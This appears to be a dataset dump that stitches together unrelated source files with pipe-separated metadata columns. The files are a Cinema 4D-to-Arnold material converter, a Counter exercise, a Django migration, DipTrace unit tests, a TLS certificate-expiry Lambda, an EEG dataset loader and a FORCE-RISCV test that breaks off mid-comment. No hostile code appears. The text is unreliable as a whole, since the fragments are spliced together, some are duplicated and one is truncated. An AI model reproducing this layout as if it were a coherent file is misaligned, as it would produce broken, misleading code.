#Create the new arnold shader
new_mat = c4d.BaseMaterial(a.ARNOLD_MATERIAL)
doc.InsertMaterial(new_mat)
doc.AddUndo(c4d.UNDOTYPE_NEW, new_mat)
#Copy the name
new_mat.SetName(mat.GetName())
#copy affectation
past_assignment(doc, mat, new_mat)
a.set_mat(new_mat)
standard_node = a.create_shader(a.ARNOLD_SHADER_GV, "standard_surface", 700, 200)
a.connect_beauty(standard_node.get_node(), 0)
#Set Diffuse
if diffuse_path:
node_diffuse_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 100)
node_diffuse_pict.set_parameter("image.filename", diffuse_path)
node_diffuse_pict.get_node().SetName("Diff image")
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.base_color")
else:
standard_node.set_parameter("standard_surface.base_color", mat[c4d.MATERIAL_COLOR_COLOR])
#Set specular
if reflectance_path:
node_specular_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 200)
node_specular_pict.set_parameter("image.filename", reflectance_path)
node_specular_pict.get_node().SetName("Spec image")
a.create_connection(node_specular_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
else:
if diffuse_path:
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
else:
standard_node.set_parameter("standard_surface.specular", 0.5)
#Set normal
if normal_path:
node_normal_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 300)
node_normal_pict.set_parameter("image.filename", normal_path)
node_normal_pict.get_node().SetName("Normal image")
node_bump = a.create_shader(a.ARNOLD_SHADER_GV, "bump2d", 350, 300)
node_bump.set_parameter("bump2d.bump_height", 0.1)
a.create_connection(node_normal_pict.get_node(), 0, node_bump.get_node(), "bump2d.bump_map")
a.create_connection(node_bump.get_node(), 0, standard_node.get_node(), "standard_surface.normal")
#Set alpha
if alpha_path:
node_alpha_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 400)
node_alpha_pict.set_parameter("image.filename", alpha_path)
node_alpha_pict.get_node().SetName("Alpha image")
if alpha_invert:
node_invert_alpha = a.create_shader(a.ARNOLD_SHADER_GV, "complement", 350, 400)
a.create_connection(node_alpha_pict.get_node(), 0, node_invert_alpha.get_node(), "complement.input")
a.create_connection(node_invert_alpha.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
else:
a.create_connection(node_alpha_pict.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
def main():
doc = c4d.documents.GetActiveDocument()
if not doc: return
doc.StartUndo()
mats = doc.GetActiveMaterials()
for mat in reversed(mats):
buffer_mat = mat
if mat.CheckType(c4d.Mmaterial):
convert_c4d_to_arnold(doc, mat)
doc.AddUndo(c4d.UNDOTYPE_DELETE, buffer_mat)
buffer_mat.Remove()
doc.EndUndo()
c4d.EventAdd()
if __name__ == '__main__':
main() | """
08-26-2017
Basic exemple of the arnold python wrapper.
It convert diffuse, first layer of reflectance, normal and alpha into a correct arnold shader.
"""
import c4d
import os
from arnold_wrapper.Arnold import Arnold
def get_reflectance(mat):
"""Get the texture inside the first slot the c4d reflectance channel"""
filename = None
base = c4d.REFLECTION_LAYER_LAYER_DATA + c4d.REFLECTION_LAYER_LAYER_SIZE * 4
try:
filename = mat[base + c4d.REFLECTION_LAYER_COLOR_TEXTURE]
except:
pass
return filename
def get_normal(mat):
"""Get the texture inside the normal channel of a c4d mat"""
filename = None
try:
filename = mat[c4d.MATERIAL_NORMAL_SHADER]
except:
pass
return filename
def get_diffuse(mat):
"""Get the texture inside the diffuse channel of a c4d mat"""
filename = None
try:
filename = mat[c4d.MATERIAL_COLOR_SHADER]
except:
pass
return filename
def get_alpha(mat):
"""Get the texture inside the alpha channel of a c4d mat"""
filename = None
inverted = False
try:
filename = mat[c4d.MATERIAL_ALPHA_SHADER]
inverted = mat[c4d.MATERIAL_ALPHA_INVERT]
except:
pass
return filename, inverted
def past_assignment(doc, source, dest):
"""Copy assignement beetween source math to dest mat"""
tag = None
ObjLink = source[c4d.ID_MATERIALASSIGNMENTS]
source_count = ObjLink.GetObjectCount()
for i in range(0, source_count):
tag = ObjLink.ObjectFromIndex(doc, i)
if tag:
doc.AddUndo(c4d.UNDOTYPE_CHANGE, tag)
tag[c4d.TEXTURETAG_MATERIAL] = dest
def get_filepath(sha):
"""Get the file path of a Xbitmap"""
if not sha:
return None
if not sha.CheckType(c4d.Xbitmap):
return None
full_path = sha[c4d.BITMAPSHADER_FILENAME]
if not full_path:
return None
return str(full_path)
def convert_c4d_to_arnold(doc, mat):
"""Main function that convert c4d mat to arnold mat"""
a = Arnold()
#Get material data
diffuse = get_diffuse(mat)
diffuse_path = get_filepath(diffuse)
reflectance = get_reflectance(mat)
reflectance_path = get_filepath(reflectance)
normal = get_normal(mat)
normal_path = get_filepath(normal)
alpha, alpha_invert = get_alpha(mat)
alpha_path = get_filepath(alpha)
#Create the new arnold shader
new_mat = c4d.BaseMaterial(a.ARNOLD_MATERIAL)
doc.InsertMaterial(new_mat)
doc.AddUndo(c4d.UNDOTYPE_NEW, new_mat)
#Copy the name
new_mat.SetName(mat.GetName())
#copy affectation
past_assignment(doc, mat, new_mat)
a.set_mat(new_mat)
standard_node = a.create_shader(a.ARNOLD_SHADER_GV, "standard_surface", 700, 200)
a.connect_beauty(standard_node.get_node(), 0)
#Set Diffuse
if diffuse_path:
node_diffuse_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 100)
node_diffuse_pict.set_parameter("image.filename", diffuse_path)
node_diffuse_pict.get_node().SetName("Diff image")
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.base_color")
else:
standard_node.set_parameter("standard_surface.base_color", mat[c4d.MATERIAL_COLOR_COLOR])
#Set specular
if reflectance_path:
node_specular_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 200)
node_specular_pict.set_parameter("image.filename", reflectance_path)
node_specular_pict.get_node().SetName("Spec image")
a.create_connection(node_specular_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
else:
if diffuse_path:
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
else:
standard_node.set_parameter("standard_surface.specular", 0.5)
#Set normal
if normal_path:
node_normal_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 300)
node_normal_pict.set_parameter("image.filename", normal_path)
node_normal_pict.get_node().SetName("Normal image")
node_bump = a.create_shader(a.ARNOLD_SHADER_GV, "bump2d", 350, 300)
node_bump.set_parameter("bump2d.bump_height", 0.1)
a.create_connection(node_normal_pict.get_node(), 0, node_bump.get_node(), "bump2d.bump_map")
a.create_connection(node_bump.get_node(), 0, standard_node.get_node(), "standard_surface.normal")
#Set alpha
if alpha_path:
node_alpha_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 400)
node_alpha_pict.set_parameter("image.filename", alpha_path)
node_alpha_pict.get_node().SetName("Alpha image")
if alpha_invert:
node_invert_alpha = a.create_shader(a.ARNOLD_SHADER_GV, "complement", 350, 400)
a.create_connection(node_alpha_pict.get_node(), 0, node_invert_alpha.get_node(), "complement.input")
a.create_connection(node_invert_alpha.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
else:
a.create_connection(node_alpha_pict.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
def main():
doc = c4d.documents.GetActiveDocument()
if not doc: return
doc.StartUndo()
mats = doc.GetActiveMaterials()
for mat in reversed(mats):
buffer_mat = mat
if mat.CheckType(c4d.Mmaterial):
convert_c4d_to_arnold(doc, mat)
doc.AddUndo(c4d.UNDOTYPE_DELETE, buffer_mat)
buffer_mat.Remove()
doc.EndUndo()
c4d.EventAdd()
if __name__ == '__main__':
main() | en | 0.545124 | 08-26-2017 Basic exemple of the arnold python wrapper. It convert diffuse, first layer of reflectance, normal and alpha into a correct arnold shader. Get the texture inside the first slot the c4d reflectance channel Get the texture inside the normal channel of a c4d mat Get the texture inside the diffuse channel of a c4d mat Get the texture inside the alpha channel of a c4d mat Copy assignement beetween source math to dest mat Get the file path of a Xbitmap Main function that convert c4d mat to arnold mat #Get material data #Create the new arnold shader #Copy the name #copy affectation #Set Diffuse #Set specular #Set normal #Set alpha | 2.824816 | 3 |
Collections/7_Company_Logo.py | FaranakAlikhah/ADM-HW1 | 0 | 6612426 | #!/usr/bin/env python
# coding: utf-8
# # section 5: Colloctions
#
# ### writer : <NAME> 1954128
# ### 7.Company Logo :
#
#
# In[ ]:
import math
import os
import random
import re
import sys
from collections import Counter
if __name__ == '__main__':
s =sorted(input())
rep=Counter(s).most_common(3)
for i in rep:
print(*i)
#
| #!/usr/bin/env python
# coding: utf-8
# # section 5: Colloctions
#
# ### writer : <NAME> 1954128
# ### 7.Company Logo :
#
#
# In[ ]:
import math
import os
import random
import re
import sys
from collections import Counter
if __name__ == '__main__':
s =sorted(input())
rep=Counter(s).most_common(3)
for i in rep:
print(*i)
#
| en | 0.446462 | #!/usr/bin/env python # coding: utf-8 # # section 5: Colloctions # # ### writer : <NAME> 1954128 # ### 7.Company Logo : # # # In[ ]: # | 3.052895 | 3 |
classes/migrations/0016_remove_classinstance_instructors.py | ericrobskyhuntley/vialab.mit.edu | 0 | 6612427 | # Generated by Django 3.0.4 on 2020-12-17 23:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('classes', '0015_auto_20201217_1850'),
]
operations = [
migrations.RemoveField(
model_name='classinstance',
name='instructors',
),
]
| # Generated by Django 3.0.4 on 2020-12-17 23:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('classes', '0015_auto_20201217_1850'),
]
operations = [
migrations.RemoveField(
model_name='classinstance',
name='instructors',
),
]
| en | 0.834361 | # Generated by Django 3.0.4 on 2020-12-17 23:51 | 1.348999 | 1 |
tests/test_MaskPaste.py | kolod/DipTrace-Library-Generator | 0 | 6612428 | <filename>tests/test_MaskPaste.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright 2021-... <NAME> <<EMAIL>>.
# This program is distributed under the MIT license.
# Glory to Ukraine!
import unittest
import DipTrace
class TestMaskPaste(unittest.TestCase):
def test_constructor_1(self):
expected = '<MaskPaste/>\n'
actual = DipTrace.MaskPaste()
self.assertEqual(expected, str(actual))
def test_constructor_2(self):
expected = '<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder"/>\n'
actual = DipTrace.MaskPaste(
top_mask=DipTrace.MaskType.Open,
bottom_mask=DipTrace.MaskType.Tented,
top_paste=DipTrace.PasteType.NoSolder,
bottom_paste=DipTrace.PasteType.Solder
)
self.assertEqual(expected, str(actual))
def test_constructor_3(self):
expected = \
'<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder" ' \
'CustomSwell="0.05" CustomShrink="0.1"/>\n'
actual = DipTrace.MaskPaste(
top_mask=DipTrace.MaskType.Open,
bottom_mask=DipTrace.MaskType.Tented,
top_paste=DipTrace.PasteType.NoSolder,
bottom_paste=DipTrace.PasteType.Solder,
swell=0.05,
shrink=0.1
)
self.assertEqual(expected, str(actual))
self.assertEqual(DipTrace.MaskType.Open, actual.top_mask)
self.assertEqual(DipTrace.MaskType.Tented, actual.bottom_mask)
self.assertEqual(DipTrace.PasteType.NoSolder, actual.top_paste)
self.assertEqual(DipTrace.PasteType.Solder, actual.bottom_paste)
self.assertEqual(0.05, actual.swell)
self.assertEqual(0.1, actual.shrink)
actual.top_mask = DipTrace.MaskType.Common
actual.top_paste = None
actual.bottom_mask = DipTrace.PasteType.Common
actual.bottom_paste = None
actual.swell = None
actual.shrink = None
self.assertEqual('<MaskPaste/>\n', str(actual))
def test_constructor_4(self):
expected = \
'<MaskPaste TopMask="By Paste" BotMask="By Paste" TopPaste="Segments" ' \
'BotPaste="Segments" Segment_Percent="50" Segment_EdgeGap="0.3" Segment_Gap="0.2" Segment_Side="1">\n' \
' <TopSegments>\n' \
' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
' </TopSegments>\n' \
' <BotSegments>\n' \
' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
' </BotSegments>\n' \
'</MaskPaste>\n'
actual = DipTrace.MaskPaste(
top_mask=DipTrace.MaskType.ByPaste,
bottom_mask=DipTrace.MaskType.ByPaste,
top_paste=DipTrace.PasteType.Segments,
bottom_paste=DipTrace.PasteType.Segments,
segments=(50, 0.3, 0.2, 1),
top_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),),
bottom_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),)
)
self.assertEqual(expected, str(actual))
self.assertTupleEqual((50, 0.3, 0.2, 1), actual.segments)
actual.segments = None
self.assertEqual(None, actual.segments)
| <filename>tests/test_MaskPaste.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright 2021-... <NAME> <<EMAIL>>.
# This program is distributed under the MIT license.
# Glory to Ukraine!
import unittest
import DipTrace
class TestMaskPaste(unittest.TestCase):
def test_constructor_1(self):
expected = '<MaskPaste/>\n'
actual = DipTrace.MaskPaste()
self.assertEqual(expected, str(actual))
def test_constructor_2(self):
expected = '<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder"/>\n'
actual = DipTrace.MaskPaste(
top_mask=DipTrace.MaskType.Open,
bottom_mask=DipTrace.MaskType.Tented,
top_paste=DipTrace.PasteType.NoSolder,
bottom_paste=DipTrace.PasteType.Solder
)
self.assertEqual(expected, str(actual))
def test_constructor_3(self):
expected = \
'<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder" ' \
'CustomSwell="0.05" CustomShrink="0.1"/>\n'
actual = DipTrace.MaskPaste(
top_mask=DipTrace.MaskType.Open,
bottom_mask=DipTrace.MaskType.Tented,
top_paste=DipTrace.PasteType.NoSolder,
bottom_paste=DipTrace.PasteType.Solder,
swell=0.05,
shrink=0.1
)
self.assertEqual(expected, str(actual))
self.assertEqual(DipTrace.MaskType.Open, actual.top_mask)
self.assertEqual(DipTrace.MaskType.Tented, actual.bottom_mask)
self.assertEqual(DipTrace.PasteType.NoSolder, actual.top_paste)
self.assertEqual(DipTrace.PasteType.Solder, actual.bottom_paste)
self.assertEqual(0.05, actual.swell)
self.assertEqual(0.1, actual.shrink)
actual.top_mask = DipTrace.MaskType.Common
actual.top_paste = None
actual.bottom_mask = DipTrace.PasteType.Common
actual.bottom_paste = None
actual.swell = None
actual.shrink = None
self.assertEqual('<MaskPaste/>\n', str(actual))
def test_constructor_4(self):
expected = \
'<MaskPaste TopMask="By Paste" BotMask="By Paste" TopPaste="Segments" ' \
'BotPaste="Segments" Segment_Percent="50" Segment_EdgeGap="0.3" Segment_Gap="0.2" Segment_Side="1">\n' \
' <TopSegments>\n' \
' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
' </TopSegments>\n' \
' <BotSegments>\n' \
' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
' </BotSegments>\n' \
'</MaskPaste>\n'
actual = DipTrace.MaskPaste(
top_mask=DipTrace.MaskType.ByPaste,
bottom_mask=DipTrace.MaskType.ByPaste,
top_paste=DipTrace.PasteType.Segments,
bottom_paste=DipTrace.PasteType.Segments,
segments=(50, 0.3, 0.2, 1),
top_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),),
bottom_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),)
)
self.assertEqual(expected, str(actual))
self.assertTupleEqual((50, 0.3, 0.2, 1), actual.segments)
actual.segments = None
self.assertEqual(None, actual.segments)
| en | 0.55591 | #!/usr/bin/python3 # -*- coding: utf-8 -*- # Copyright 2021-... <NAME> <<EMAIL>>. # This program is distributed under the MIT license. # Glory to Ukraine! | 2.962075 | 3 |
hsm_software/sw/hsm_tools/cryptech/cryptech/__init__.py | DiamondKeySecurity/HSM | 0 | 6612429 | #!/usr/bin/env python
# Copyright (c) 2018, 2019 Diamond Key Security, NFP All rights reserved.
#
__all__ = ["libhal"]
| #!/usr/bin/env python
# Copyright (c) 2018, 2019 Diamond Key Security, NFP All rights reserved.
#
__all__ = ["libhal"]
| en | 0.653147 | #!/usr/bin/env python # Copyright (c) 2018, 2019 Diamond Key Security, NFP All rights reserved. # | 1.052075 | 1 |
functions/tls_cert_checker/tls_cert_checker.py | radon-h2020/radon-function-lib | 0 | 6612430 | <reponame>radon-h2020/radon-function-lib
# this python program was written using python 3.8.6
from pprint import pprint
import json
import sys
import check_tls_certs
# from check_tls_certs import main as check_tls_cert
"""
This lambda function takes a domain name or a list of domain names
and returns an overview of the status of the SSL/TLS certificates served.
The function uses check_tls_cert by @fschulze - https://github.com/fschulze/check-tls-certs
This function was developed by @zanderhavgaard
"""
# prefix for error messages:
ERROR_PREFIX = "ERROR:"
def handler(event, context):
if "body" in event:
# the API gateway will wrap the request body, so we must parse it
parameters = json.loads(event["body"])
else:
parameters = event
# parse function parameters
parse_error, domains = parse_parameters(params=parameters)
if parse_error:
return parse_error
# use check_tls_certs to check the domains
check_error, result = check_domains(domains=domains)
if check_error:
return check_error
# format the check_tls_certs output to be JSON compatible
format_error, formatted_result = format_result(result=result)
if format_error:
return format_error
# set the response body
body = formatted_result
# build the response
response = {"statusCode": 200, "body": json.dumps(body)}
return response
def check_domains(domains: list) -> (str, list):
error = None
result = None
# check_tls_certs metadata
_file = None
expiry_warn = 0
verbosity = 2
# try:
# use check_tls_certs to check the certificates of the provided domain names
# result = check_tls_cert(file=_file, domain=domains, expiry_warn=expiry_warn, verbose=verbosity)
result = check_tls_certs.main(file=_file, domain=domains, expiry_warn=expiry_warn, verbose=verbosity)
# except Exception:
# error = f"{ERROR_PREFIX} there was error checking the specified domain(s), please verify that the domain names are valid."
return error, result
def format_result(result: list) -> (str, list):
error = None
formatted_result = []
try:
for domain, messages, expiration in result:
# format each domains result tuple into a dictionary
res = {"Domain": domain[0], "messages": [], "Certificate Expiry Date": str(expiration)}
for message in messages:
# format each message tuple into a string
message_str = f"{message[0]}: {message[1]}"
res["messages"].append(message_str)
formatted_result.append(res)
except Exception:
error = f"{ERROR_PREFIX}: There was an error formatting the result."
return error, formatted_result
def parse_parameters(params: dict) -> (str, str, str):
# return an error string if any of the parameters are not parsed correctly, or missing
error = None
domains = []
if "domain" in params:
domains.append(params["domain"])
if "domains" in params:
for domain in params["domains"]:
domains.append(domain)
# if no domains are provided, return an error
if not domains:
error = f"{ERROR_PREFIX} you must at least one domain name with the 'domain' argument, or a list of domains using the 'domains' argument."
return error, domains
# test the code locally
# will only be run if called from cli
if __name__ == "__main__":
from pprint import pprint
# test_json_file = "tests/test_domain1.json"
# test_json_file = "tests/test_domain_expired.json"
test_json_file = "tests/test_domains.json"
with open(test_json_file) as test_json:
test_event = json.load(test_json)
test_context = {}
test_res = handler(test_event, test_context)
pprint(json.loads(test_res["body"]))
| # this python program was written using python 3.8.6
from pprint import pprint
import json
import sys
import check_tls_certs
# from check_tls_certs import main as check_tls_cert
"""
This lambda function takes a domain name or a list of domain names
and returns an overview of the status of the SSL/TLS certificates served.
The function uses check_tls_cert by @fschulze - https://github.com/fschulze/check-tls-certs
This function was developed by @zanderhavgaard
"""
# prefix for error messages:
ERROR_PREFIX = "ERROR:"
def handler(event, context):
if "body" in event:
# the API gateway will wrap the request body, so we must parse it
parameters = json.loads(event["body"])
else:
parameters = event
# parse function parameters
parse_error, domains = parse_parameters(params=parameters)
if parse_error:
return parse_error
# use check_tls_certs to check the domains
check_error, result = check_domains(domains=domains)
if check_error:
return check_error
# format the check_tls_certs output to be JSON compatible
format_error, formatted_result = format_result(result=result)
if format_error:
return format_error
# set the response body
body = formatted_result
# build the response
response = {"statusCode": 200, "body": json.dumps(body)}
return response
def check_domains(domains: list) -> (str, list):
error = None
result = None
# check_tls_certs metadata
_file = None
expiry_warn = 0
verbosity = 2
# try:
# use check_tls_certs to check the certificates of the provided domain names
# result = check_tls_cert(file=_file, domain=domains, expiry_warn=expiry_warn, verbose=verbosity)
result = check_tls_certs.main(file=_file, domain=domains, expiry_warn=expiry_warn, verbose=verbosity)
# except Exception:
# error = f"{ERROR_PREFIX} there was error checking the specified domain(s), please verify that the domain names are valid."
return error, result
def format_result(result: list) -> (str, list):
error = None
formatted_result = []
try:
for domain, messages, expiration in result:
# format each domains result tuple into a dictionary
res = {"Domain": domain[0], "messages": [], "Certificate Expiry Date": str(expiration)}
for message in messages:
# format each message tuple into a string
message_str = f"{message[0]}: {message[1]}"
res["messages"].append(message_str)
formatted_result.append(res)
except Exception:
error = f"{ERROR_PREFIX}: There was an error formatting the result."
return error, formatted_result
def parse_parameters(params: dict) -> (str, str, str):
# return an error string if any of the parameters are not parsed correctly, or missing
error = None
domains = []
if "domain" in params:
domains.append(params["domain"])
if "domains" in params:
for domain in params["domains"]:
domains.append(domain)
# if no domains are provided, return an error
if not domains:
error = f"{ERROR_PREFIX} you must at least one domain name with the 'domain' argument, or a list of domains using the 'domains' argument."
return error, domains
# test the code locally
# will only be run if called from cli
if __name__ == "__main__":
from pprint import pprint
# test_json_file = "tests/test_domain1.json"
# test_json_file = "tests/test_domain_expired.json"
test_json_file = "tests/test_domains.json"
with open(test_json_file) as test_json:
test_event = json.load(test_json)
test_context = {}
test_res = handler(test_event, test_context)
pprint(json.loads(test_res["body"])) | en | 0.592702 | # this python program was written using python 3.8.6 # from check_tls_certs import main as check_tls_cert This lambda function takes a domain name or a list of domain names and returns an overview of the status of the SSL/TLS certificates served. The function uses check_tls_cert by @fschulze - https://github.com/fschulze/check-tls-certs This function was developed by @zanderhavgaard # prefix for error messages: # the API gateway will wrap the request body, so we must parse it # parse function parameters # use check_tls_certs to check the domains # format the check_tls_certs output to be JSON compatible # set the response body # build the response # check_tls_certs metadata # try: # use check_tls_certs to check the certificates of the provided domain names # result = check_tls_cert(file=_file, domain=domains, expiry_warn=expiry_warn, verbose=verbosity) # except Exception: # error = f"{ERROR_PREFIX} there was error checking the specified domain(s), please verify that the domain names are valid." # format each domains result tuple into a dictionary # format each message tuple into a string # return an error string if any of the parameters are not parsed correctly, or missing # if no domains are provided, return an error # test the code locally # will only be run if called from cli # test_json_file = "tests/test_domain1.json" # test_json_file = "tests/test_domain_expired.json" | 3.189834 | 3 |
EEG_Lightning/dassl/data/datasets/general_dataset_v1.py | mcd4874/NeurIPS_competition | 23 | 6612431 | import os.path as osp
from dassl.data.datasets.build import DATASET_REGISTRY
from dassl.data.datasets.base_dataset import Datum, DatasetBase,EEGDatum
from dassl.data.datasets.ProcessDataBase import ProcessDataBase
from scipy.io import loadmat
import numpy as np
@DATASET_REGISTRY.register()
class GENERAL_DATASET(ProcessDataBase):
# dataset_dir = 'KAGGLE_BCI'
# file_name = 'KaggleBCI.mat'
# domains = [0,3,4,5,6,7,8]
def __init__(self, cfg):
super().__init__(cfg)
# assum that number of subjects represent the domain
def _read_data(self,data_path):
"""
Process data from .mat file
Re-implement this function to process new dataset
Generate train data and test data with shape (subjects,trials,channels,frequency)
.mat data format shall be
"train_data":train_data,
"train_label":train_label,
"test_data":test_data,
"test_label":test_label
"""
temp = loadmat(data_path)
total_data = temp['train_data']
total_label = temp['train_label']
total_label = np.array(total_label)
total_label = np.squeeze(total_label)
total_label = total_label.astype(int)
test_data = temp['test_data']
test_lbl = temp['test_label']
test_data = np.array(test_data) # (subjects,trials,channels,frequency)
test_lbl = np.array(test_lbl)
test_lbl = test_lbl.astype(int)
print("train data shape : {} | train label shape : {}".format(total_data.shape,total_label.shape))
print("test data shape : {} | test label shape : {}".format(test_data.shape, test_lbl.shape))
return [total_data,total_label,test_data,test_lbl]
| import os.path as osp
from dassl.data.datasets.build import DATASET_REGISTRY
from dassl.data.datasets.base_dataset import Datum, DatasetBase,EEGDatum
from dassl.data.datasets.ProcessDataBase import ProcessDataBase
from scipy.io import loadmat
import numpy as np
@DATASET_REGISTRY.register()
class GENERAL_DATASET(ProcessDataBase):
# dataset_dir = 'KAGGLE_BCI'
# file_name = 'KaggleBCI.mat'
# domains = [0,3,4,5,6,7,8]
def __init__(self, cfg):
super().__init__(cfg)
# assum that number of subjects represent the domain
def _read_data(self,data_path):
"""
Process data from .mat file
Re-implement this function to process new dataset
Generate train data and test data with shape (subjects,trials,channels,frequency)
.mat data format shall be
"train_data":train_data,
"train_label":train_label,
"test_data":test_data,
"test_label":test_label
"""
temp = loadmat(data_path)
total_data = temp['train_data']
total_label = temp['train_label']
total_label = np.array(total_label)
total_label = np.squeeze(total_label)
total_label = total_label.astype(int)
test_data = temp['test_data']
test_lbl = temp['test_label']
test_data = np.array(test_data) # (subjects,trials,channels,frequency)
test_lbl = np.array(test_lbl)
test_lbl = test_lbl.astype(int)
print("train data shape : {} | train label shape : {}".format(total_data.shape,total_label.shape))
print("test data shape : {} | test label shape : {}".format(test_data.shape, test_lbl.shape))
return [total_data,total_label,test_data,test_lbl]
| en | 0.684955 | # dataset_dir = 'KAGGLE_BCI' # file_name = 'KaggleBCI.mat' # domains = [0,3,4,5,6,7,8] # assum that number of subjects represent the domain Process data from .mat file Re-implement this function to process new dataset Generate train data and test data with shape (subjects,trials,channels,frequency) .mat data format shall be "train_data":train_data, "train_label":train_label, "test_data":test_data, "test_label":test_label # (subjects,trials,channels,frequency) | 2.438537 | 2 |
tests/riscv/state_transition/state_transition_partial_force.py | Wlgen/force-riscv | 111 | 6612432 | <gh_stars>100-1000
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import RandomUtils
import StateTransition
from Enums import EStateElementType, EStateTransitionType
from State import State
import state_transition_test_utils
from base.Sequence import Sequence
from base.StateTransitionHandler import StateTransitionHandler
from riscv.EnvRISCV import EnvRISCV
from riscv.GenThreadRISCV import GenThreadRISCV
# A test StateTransitionHandler that defers to the default
# StateTransitionHandler some of the time.
class PartialStateTransitionHandlerTest(StateTransitionHandler):
# Execute the State change represented by the StateElement. Only instances
# of the StateElement types for which the StateTransitionHandler has been
# registered will be passed to this method. Other StateTransitionHandlers
# will process the other StateElement types. It is important to avoid
# making changes to entities represented by StateElements that have already
# been processed. Changes to entities represented by StateElements that
# will be processed later are permitted.
#
# @param aStateElem A StateElement object.
def processStateElement(self, aStateElem):
processed = False
# Randomly decide whether to process the StateElement or defer to the
# default implementation
if RandomUtils.random32(0, 1) == 1:
(mem_block_ptr_index,) = self.getArbitraryGprs(1, aExclude=(0,))
self.initializeMemoryBlock(mem_block_ptr_index, (aStateElem,))
self.genInstruction(
"FLD##RISCV",
{
"rd": aStateElem.getRegisterIndex(),
"rs1": mem_block_ptr_index,
"simm12": 0,
"NoRestriction": 1,
},
)
processed = True
return processed
# This test verifies that a StateTransition handler can process some of the
# StateElements and defer to the default StateTransitionHandler for the
# remaining StateElements.
class MainSequence(Sequence):
def __init__(self, aGenThread, aName=None):
super().__init__(aGenThread, aName)
self._mExpectedStateData = {}
def generate(self, **kargs):
state_trans_handler = PartialStateTransitionHandlerTest(self.genThread)
StateTransition.registerStateTransitionHandler(
state_trans_handler,
EStateTransitionType.Explicit,
(EStateElementType.FloatingPointRegister,),
)
test_utils = state_transition_test_utils
state = self._createState()
StateTransition.transitionToState(state)
test_utils.verify_state(self, self._mExpectedStateData)
# Create a simple State to test an explicit StateTransition.
def _createState(self):
state = State()
test_utils = state_transition_test_utils
self._mExpectedStateData[
EStateElementType.FloatingPointRegister
] = test_utils.add_random_floating_point_register_state_elements(
self, state, RandomUtils.random32(0, 15)
)
return state
MainSequenceClass = MainSequence
GenThreadClass = GenThreadRISCV
EnvClass = EnvRISCV
| #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import RandomUtils
import StateTransition
from Enums import EStateElementType, EStateTransitionType
from State import State
import state_transition_test_utils
from base.Sequence import Sequence
from base.StateTransitionHandler import StateTransitionHandler
from riscv.EnvRISCV import EnvRISCV
from riscv.GenThreadRISCV import GenThreadRISCV
# A test StateTransitionHandler that defers to the default
# StateTransitionHandler some of the time.
class PartialStateTransitionHandlerTest(StateTransitionHandler):
# Execute the State change represented by the StateElement. Only instances
# of the StateElement types for which the StateTransitionHandler has been
# registered will be passed to this method. Other StateTransitionHandlers
# will process the other StateElement types. It is important to avoid
